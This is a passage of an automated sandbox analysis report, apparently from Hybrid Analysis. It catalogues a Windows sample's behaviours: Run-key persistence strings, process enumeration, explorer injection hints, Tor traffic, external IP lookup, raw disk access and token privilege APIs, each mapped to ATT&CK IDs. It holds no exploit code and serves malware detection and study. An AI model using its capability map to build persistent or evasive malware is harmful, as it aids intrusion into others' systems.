Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00D92000.00000002.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"LookupPrivilegeValueW\" (Indicator: \"LookupPrivilegeValue\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-91", "type": 2, "relevance": 1, "name": "Contains ability to hook/unhook windows functions (API string)", "description": "Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"SetWindowsHookExA\" (Indicator: \"SetWindowsHook\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-114", "type": 2, "relevance": 1, "name": "Contains ability to obtains specified information about the security of a file or directory (API string)", "description": "Found reference to API \"FreeSid\" (Indicator: \"FreeSid\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"AllocateAndInitializeSid\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"AllocateAndInitializeSid\" (Indicator: \"InitializeSid\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"SetSecurityDescriptorDacl\" (Indicator: \"SetSecurityDescriptorDacl\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"SetSecurityDescriptorGroup\" (Indicator: \"SetSecurityDescriptorGroup\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"InitializeSecurityDescriptor\" (Indicator: \"InitializeSecurityDescriptor\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetSidSubAuthority\" (Indicator: \"GetSidSubAuthority\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"InitializeSid\" (Indicator: \"InitializeSid\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetSidLengthRequired\" (Indicator: \"GetSidLengthRequired\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetSidSubAuthorityCount\" (Indicator: \"GetSidSubAuthority\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetSidSubAuthorityCount\" (Indicator: \"GetSidSubAuthorityCount\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"DEBUGHEAPFLAGS\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FILEINFO\\INSTANCES\\FILEINFO\"; Key: \"FLAGS\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FILEINFO\\INSTANCES\\FILEINFO\"; Key: \"ALTITUDE\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LUAFV\\INSTANCES\\LUAFV\"; Key: \"FLAGS\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LUAFV\\INSTANCES\\LUAFV\"; Key: \"ALTITUDE\"; Value: \"\")\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-4", "type": 18, "relevance": 3, "name": "Detected Suricata Alert - External IP Lookup", "description": "Detected alert \"ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI\" (SID: 2047703, Rev: 1, Severity: 3) categorized as \"Misc activity\"\n Detected alert \"ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup\" (SID: 2047702, Rev: 1, Severity: 3) categorized as \"Misc activity\"", "origin": "Suricata Alerts", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-0", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"SURICATA HTTP Request abnormal Content-Encoding header\" (SID: 2221033, Rev: 1, Severity: 3) categorized as \"Generic Protocol Command Decode\"\n Detected alert \"ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI\" (SID: 2047703, Rev: 1, Severity: 3) categorized as \"Misc activity\"\n Detected alert \"ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup\" (SID: 2047702, Rev: 1, Severity: 3) categorized as \"Misc activity\"", "origin": "Suricata Alerts"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "string-63", "type": 2, "relevance": 3, "name": "Found a potential E-Mail address in binary/memory", "description": "Pattern match: \"linus@nordberg.se\"\n Pattern match: \"tor@sebastianhahn.net\"", "origin": "File/Memory", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "GetTickCount\n LoadLibraryA", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "string-184", "type": 2, "relevance": 5, "name": "Found registry location strings which can modify auto-execute functionality", "description": "Found string \"\\REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"\\REGISTRY\\MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\" (Indicator: \"software\\wow6432node\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "string-4", "type": 2, "relevance": 4, "name": "Found a string that may be used as part of an injection method", "description": "\"Shell_TrayWnd\" (Taskbar window class may be used to inject into explorer with the SetWindowLong method) in Source: 00000000-00001188.00000000.296751.00DF0000.00000002.mdmp\n 00000000-00001188.00000001.298674.00DF0000.00000002.mdmp\n 00000000-00001188.00000002.300597.00DF0000.00000002.mdmp\n \"Progman\" (Program manager) in Source: 00000000-00001188.00000000.296751.00DF0000.00000002.mdmp\n 00000000-00001188.00000001.298674.00DF0000.00000002.mdmp\n 00000000-00001188.00000002.300597.00DF0000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has section name .text with entropy \"6.39387121804\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has section name .rdata with entropy \"7.99901951839\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\" has section name .data with entropy \"6.3157393046\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"r whoami Re3b4wRQ1efYPYrSuP/wdV53NQA 8oRrt42pvMiUHzp4RYmA6GyBYlQ 2025-02-20 03:11:53 <IPv4> 9001 0\" (Indicator: \"whoami\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "string-30", "type": 2, "relevance": 3, "name": "Contains references to WMI/WMIC", "description": "Found string \"WmiPrvSE.exe\" (Indicator: \"wmiprvse.exe\"; in Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000001.298674.034B0000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 372\" (SID: 2522371, Rev: 5793, Severity: 2) categorized as \"Misc Attack\"\n Detected alert \"ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 297\" (SID: 2522296, Rev: 5793, Severity: 2) categorized as \"Misc Attack\"\n Detected alert \"ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 416\" (SID: 2522415, Rev: 5793, Severity: 2) categorized as \"Misc Attack\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "network-29", "type": 7, "relevance": 3, "name": "Sends network traffic on the daytime protocol port (may be used as an evasive sleep)", "description": "\"Daytime protocol (RFC 867) traffic to <IPv4> on port 13", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "string-56", "type": 2, "relevance": 6, "name": "Found a reference to an external IP address lookup service", "description": "\"api.ipify.org\" (Indicator: \"api.ipify.org\"; File: \"PCAP\")\n \"https://api.ipify.org/\" (Indicator: \"api.ipify.org\"; File: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-24", "type": 7, "relevance": 6, "name": "Tries to identify its external IP address", "description": "\"api.ipify.org\"", "origin": "Network Traffic", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "api-59", "type": 6, "relevance": 5, "name": "Interacts with the primary disk partition (DR0)", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" interacting with \"\\Device\\Harddisk0\\DR0\" using IoControlCode 0x2d1400", "origin": "API Call", "attck_id": "T1542.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET INFO TOR Consensus Data Requested\" (SID: 2028914, Rev: 2, Severity: 1) categorized as \"Potential Corporate Privacy Violation\"\n Detected alert \"ET P2P Tor Get Server Request\" (SID: 2008113, Rev: 5, Severity: 1) categorized as \"Potential Corporate Privacy Violation\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe
https://hybrid-analysis.com/sample/6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe
Hybrid Analysis - Um_unhooking
